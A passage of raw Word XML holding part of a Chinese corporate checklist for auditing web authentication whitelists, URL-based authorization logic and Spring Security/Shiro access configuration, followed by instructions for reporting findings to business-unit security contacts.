        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003E724C" w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7F9E" w:rsidRDefault="00D71415" w:rsidP="00E8363B">
      <w:pPr>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>解决方案：</w:t>
      </w:r>
      <w:r w:rsidR="00E8363B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参见</w:t>
      </w:r>
      <w:r w:rsidR="00E8363B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E8363B" w:rsidRPr="002C4DCB" w:rsidRDefault="00E8363B" w:rsidP="00E8363B">
      <w:pPr>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:b/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E7F9E" w:rsidRDefault="002E7F9E" w:rsidP="002E7F9E">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>认证白名单是否设置合理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7F9E" w:rsidRDefault="00195C3F" w:rsidP="002E7F9E">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00195C3F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重点排查系统中设置的可匿名访问的页面和资源，确认这些页面和资源是否会泄露</w:t>
      </w:r>
      <w:r w:rsidRPr="00195C3F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>敏感数据</w:t>
      </w:r>
      <w:r w:rsidR="00A10DD8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，被匿名访问是否合理</w:t>
      </w:r>
      <w:r w:rsidRPr="00195C3F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00195C3F" w:rsidRDefault="00195C3F" w:rsidP="002E7F9E">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例</w:t>
      </w:r>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该产品设置登出操作</w:t>
      </w:r>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016660F">
        <w:t>logout.action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为白名单，可匿名访问。且判断逻辑不严谨，导致认证被绕过。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00195C3F" w:rsidRPr="00A10DD8" w:rsidRDefault="00A10DD8" w:rsidP="002E7F9E">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A10DD8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>解决方案：</w:t>
      </w:r>
      <w:r w:rsidR="00E8363B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参见</w:t>
      </w:r>
      <w:r w:rsidR="00E8363B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.2.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00303753" w:rsidRDefault="007168E2" w:rsidP="00303753">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>排查</w:t>
      </w:r>
      <w:r w:rsidR="00752FAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自研</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鉴权</w:t>
      </w:r>
      <w:r w:rsidR="00045EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的实现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00303753" w:rsidRDefault="00303753" w:rsidP="00A630D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用系统中用户通过认证后需要做进一步的用户角色、权限的判断及鉴权，系统一般维护着一份用户角色权限及可访问资源对应表，其中很重要的决策依据也是依赖对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的判断。对权限判断的实现逻辑需要做重点排查。排查项目包括但不限于：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00303753" w:rsidRPr="006630B9" w:rsidRDefault="00303753" w:rsidP="00A630D7">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006630B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>是否依赖客户端提交信息作为用户身份决策依据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B779EE" w:rsidRPr="00B779EE" w:rsidRDefault="00B779EE" w:rsidP="00A630D7">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B779EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>解决方案：</w:t>
      </w:r>
      <w:r w:rsidR="00243881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参见</w:t>
      </w:r>
      <w:r w:rsidR="00243881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.3.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006630B9" w:rsidRDefault="00763861" w:rsidP="00A630D7">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006630B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>作为鉴权决策的</w:t>
      </w:r>
      <w:r w:rsidRPr="006630B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="006630B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>是否可靠。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00763861" w:rsidRPr="006630B9" w:rsidRDefault="00272262" w:rsidP="00A630D7">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006630B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>排查</w:t>
      </w:r>
      <w:r w:rsidR="00AF30DE" w:rsidRPr="006630B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="006630B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同</w:t>
      </w:r>
      <w:r w:rsidR="00725C98" w:rsidRPr="006630B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="006630B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidR="00763861" w:rsidRPr="006630B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidR="00763861" w:rsidRPr="006630B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00763861" w:rsidRPr="006630B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标准化。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006630B9" w:rsidRDefault="00763861" w:rsidP="00A630D7">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006630B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>鉴权决策</w:t>
      </w:r>
      <w:r w:rsidRPr="006630B9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>是否依赖局部或模糊匹配作为判断依据</w:t>
      </w:r>
      <w:r w:rsidRPr="006630B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00303753" w:rsidRPr="006630B9" w:rsidRDefault="00763861" w:rsidP="00A630D7">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006630B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>排查方法同</w:t>
      </w:r>
      <w:r w:rsidR="00725C98" w:rsidRPr="006630B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="006630B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidRPr="006630B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的模糊匹配。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00153B6E" w:rsidRPr="006630B9" w:rsidRDefault="00153B6E" w:rsidP="00A630D7">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006630B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>权限设置是否有遗漏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70560" w:rsidRDefault="00D70560" w:rsidP="00A630D7">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>排查系统的权限配置列表是否覆盖了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中的所有页面及资源，是否有遗漏。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70560" w:rsidRDefault="00D70560" w:rsidP="00A630D7">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D70560">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>解决方案：</w:t>
      </w:r>
      <w:r w:rsidR="00243881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参见</w:t>
      </w:r>
      <w:r w:rsidR="00243881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.3.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00271141" w:rsidRDefault="00271141" w:rsidP="00271141">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00271141">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>排查认证、鉴权配置是否</w:t>
      </w:r>
      <w:r w:rsidR="00B96006">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>合理、全面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2AAC" w:rsidRDefault="00DB2AAC" w:rsidP="00A630D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>业界成熟的安全框架（如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Spring Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Shiro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等）都提供了较完善的认证、鉴权机制，代码质量和逻辑都经过了广泛的使用和验证</w:t>
      </w:r>
      <w:r w:rsidR="0038021E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。但对于认证、鉴权功能的实现往往依赖具体的安全配置，在产品配置过程中有可能会发生遗漏。应对相应的安全配置文件做重点排查。排查项目包括但不限于：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038021E" w:rsidRDefault="00494BF2" w:rsidP="00A630D7">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>匿名访问资源配置是否合理。常见的可匿名访问的资源包括：图片、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等静态文件、系统主页、用户登录页面等。对于其他页面资源应谨慎设置匿名访问，防止敏感数据泄漏及认证被绕过。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00494BF2" w:rsidRDefault="00B96006" w:rsidP="00A630D7">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限检查配置是否无遗漏。是否对所有非匿名访问资源都设置了对应的权限检查机制？对于配置文件中未设置权限检查的页面和资源采取阻断还是放行？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF41D7" w:rsidRDefault="00A6239B" w:rsidP="00A630D7">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="839" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006855DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>解决方案：</w:t>
      </w:r>
      <w:r w:rsidRPr="006855DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了框架的产品尽量使用框架的白名单机制，默认阻止对未配置权限控制的页面及资源的访问，减少出现遗漏的可能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A0E3E" w:rsidRDefault="001A0E3E" w:rsidP="001E705A">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>结果反馈</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F300C" w:rsidRPr="002F300C" w:rsidRDefault="00E56002" w:rsidP="00E56002">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00237F6D">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>排查完成后请</w:t>
      </w:r>
      <w:r w:rsidR="00EA60FC" w:rsidRPr="00237F6D">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>各产品</w:t>
      </w:r>
      <w:r w:rsidRPr="00237F6D">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如实反馈</w:t>
      </w:r>
      <w:r w:rsidR="00AF6211">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>排查过程中发现的共性问题</w:t>
      </w:r>
      <w:r w:rsidR="00EA60FC" w:rsidRPr="00237F6D">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，各BU的排查结果统一反馈到BU安全办公室接口人处</w:t>
      </w:r>
      <w:r w:rsidR="00790711" w:rsidRPr="00237F6D">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>汇总</w:t>
      </w:r>
      <w:r w:rsidR="00EA60FC" w:rsidRPr="00237F6D">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="0030190E" w:rsidRPr="00237F6D">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具体反馈格式请参考以下表格：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="0" w:name="_MON_1499152788"/>
    <w:bookmarkEnd w:id="0"/>
    <w:p w:rsidR="00E56002" w:rsidRDefault="00FB6050" w:rsidP="002F300C">
      <w:pPr>
        <w:ind w:firstLineChars="300" w:firstLine="630"/>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="1534" w:dyaOrig="963">
          <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:76.6pt;height:47.8pt" o:ole="">
            <v:imagedata r:id="rId25" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Excel.Sheet.12" ShapeID="_x0000_i1029" DrawAspect="Icon" ObjectID="_1499847736" r:id="rId26"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A0E3E" w:rsidRDefault="000C0EC2" w:rsidP="001A0E3E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于共性问题排查出来的产品漏洞，</w:t>
      </w:r>
      <w:r w:rsidR="00D407AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由漏洞管理部</w:t>
      </w:r>
      <w:r w:rsidR="00866B46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和安全办公室</w:t>
      </w:r>
      <w:r w:rsidR="00D407AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组织分析后再决定后续</w:t>
      </w:r>
      <w:r w:rsidR="00AA077F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理</w:t>
      </w:r>
      <w:r w:rsidR="00D407AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A0E3E" w:rsidRPr="001A0E3E" w:rsidRDefault="001A0E3E" w:rsidP="00D407AA">
      <w:pPr>
        <w:ind w:firstLineChars="300" w:firstLine="630"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D422CB" w:rsidRDefault="00D422CB" w:rsidP="00D422CB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="bookantiqua" w:hAnsi="bookantiqua" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="bookantiqua" w:hAnsi="bookantiqua" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>技术支持与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>IT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="bookantiqua" w:hAnsi="bookantiqua" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>电子流支持</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00206C1E" w:rsidRPr="00206C1E" w:rsidRDefault="00206C1E" w:rsidP="00206C1E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00D422CB">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:cs="Arial"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>BU</w:t>
      </w:r>
      <w:r w:rsidRPr="00D422CB">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>安全工程部接口人</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D422CB" w:rsidRPr="00D422CB" w:rsidRDefault="00D422CB" w:rsidP="00D422CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D422CB">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>各个技术问题请咨询</w:t>
      </w:r>
      <w:r w:rsidRPr="00D422CB">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>BU</w:t>
      </w:r>
      <w:r w:rsidRPr="00D422CB">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>安全工程部接口人，漏洞处理策略和报备问题请联系并咨询</w:t>
      </w:r>
      <w:r w:rsidRPr="00D422CB">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>BU</w:t>
      </w:r>
      <w:r w:rsidRPr="00D422CB">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>安全办公室接口人，详细如下表：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003117D5" w:rsidRDefault="003117D5" w:rsidP="00CF74BE"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5151"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7EDCC"/>
        <w:tblCellMar>
